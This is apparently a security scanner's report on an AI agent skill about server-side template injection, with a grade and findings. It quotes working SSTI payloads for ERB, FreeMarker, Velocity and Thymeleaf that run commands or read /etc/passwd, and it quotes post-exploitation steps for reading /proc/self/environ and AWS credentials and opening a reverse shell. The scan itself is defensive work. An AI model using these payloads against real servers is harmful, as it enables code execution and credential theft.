ssti-server-side-template-injection
github.com/yaklang/hack-skills
Scanned Thu, 28 May 2026 17:27:37 GMT
Scan ID crawl-uaeqbgwr2wdsr8wje7yir2a7 · 1ms
Grade: C
Score: 55 / 100
Verdict: Proceed with caution
4 high-severity findings.
This skill reads protected filesystem locations plus 12 other issues listed below.
0 critical · 4 high · 9 medium · -1 rules passed
Why grade C?
Score: 55 / 100. The current grade reflects 4 high-severity findings (3+ HIGHs → C).
0 CRIT · 4 HIGH · 9 MED · 0 LOW
To reach a higher grade:
- Reach B (target score 75): Resolve 2 of 4 HIGH (cap is 2) + 4 of 9 MED (cap is 5).
- Reach A (target score 95): Resolve all 4 HIGH + 7 of 9 MED (cap is 2).
Thresholds are documented at /docs/grading. Source-of-truth is the grade() function in @skillox/scanner.
Findings · ordered by severity
HIGH: Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
  222  <%= `id` %>
  223  <%= IO.popen('id').read %>
  224  <%= File.read('/etc/passwd') %>    ← sensitive path — credential-exfiltration vector
  225  ```
  226
HIGH: Sensitive filesystem path referenced
The skill references a path (`/proc/self/environ`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
  274
  275  **Post-RCE pivot**:
  276  1. Read `/proc/self/environ` — env vars with credentials    ← sensitive path — credential-exfiltration vector
  277  2. Read application config files — DB passwords, API keys
  278  3. `cat ~/.aws/credentials` — cloud credentials
HIGH: Sensitive filesystem path referenced
The skill references a path (`~/.aws/`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
  276  1. Read `/proc/self/environ` — env vars with credentials
  277  2. Read application config files — DB passwords, API keys
  278  3. `cat ~/.aws/credentials` — cloud credentials    ← sensitive path — credential-exfiltration vector
  279  4. Reverse shell for persistence
  280
HIGH: Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
  335  When Flask **debug mode** (Werkzeug debugger) is exposed but **PIN-protected**, the PIN is derived from host-specific values. Typical inputs for public PIN calculation scripts:
  336
  337  1. **`username`** — from `/etc/passwd` (the user running the Flask process)    ← sensitive path — credential-exfiltration vector
  338  2. **Module name** — often `flask.app` or `Flask`
  339  3. **Application path** — `app.py` or the real main filename
MED: Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
  101  {{''.__class__.__mro__[1].__subclasses__()}}
  102
  103  # Find subprocess.Popen index (usually around 258-270, varies by Python version):    ← spawns a subprocess outside declared capabilities
  104  # Look for "subprocess.Popen" in the list
  105
MED: Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
  102
  103  # Find subprocess.Popen index (usually around 258-270, varies by Python version):
  104  # Look for "subprocess.Popen" in the list    ← spawns a subprocess outside declared capabilities
  105
  106  # Execute command (replace [258] with correct index):
MED: Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
  177  ```freemarker
  178  <#assign ob="freemarker.template.utility.ObjectConstructor"?new()>
  179  <#assign br=ob("java.io.BufferedReader",ob("java.io.InputStreamReader",ob("java.lang.Runtime")?api.exec("id").inputStream))>    ← spawns a subprocess outside declared capabilities
  180  ${br.readLine()}
  181  ```
MED: Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
  203  ```velocity
  204  #set($str=$class.inspect("java.lang.Runtime").method.invoke($class.inspect("java.lang.Runtime").type, null))
  205  #set($run=$str.exec("id"))    ← spawns a subprocess outside declared capabilities
  206  #set($out=$run.inputStream)
  207  ```
MED: Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
  232  ```java
  233  // In th:text or th:fragment context:
  234  __${T(java.lang.Runtime).getRuntime().exec("id")}__::type    ← spawns a subprocess outside declared capabilities
  235
  236  // Fragment expression context:
MED: Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
  235
  236  // Fragment expression context:
  237  __${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/sh","-c","id"}).getInputStream())}__::type    ← spawns a subprocess outside declared capabilities
  238  ```
  239
MED: Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
  267  ├── FreeMarker → freemarker.template.utility.Execute?new()
  268  ├── Twig → _self.env.registerUndefinedFilterCallback('exec')
  269  ├── Velocity → java.lang.Runtime.exec()    ← spawns a subprocess outside declared capabilities
  270  ├── ERB → <%= `cmd` %>
  271  ├── Thymeleaf → T(java.lang.Runtime).getRuntime().exec()
MED: Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
  269  ├── Velocity → java.lang.Runtime.exec()
  270  ├── ERB → <%= `cmd` %>
  271  ├── Thymeleaf → T(java.lang.Runtime).getRuntime().exec()    ← spawns a subprocess outside declared capabilities
  272  └── Angular CSTI → constructor.constructor('payload')()
  273  ```
MED: No capability manifest declared
The skill ships without a `manifest.yaml` or `capabilities` block in its frontmatter. Without a manifest, the runtime cannot enforce what this skill is permitted to do.
rule: no-manifest

skillox.io/r/crawl-uaeqbgwr2wdsr8wje7yir2a7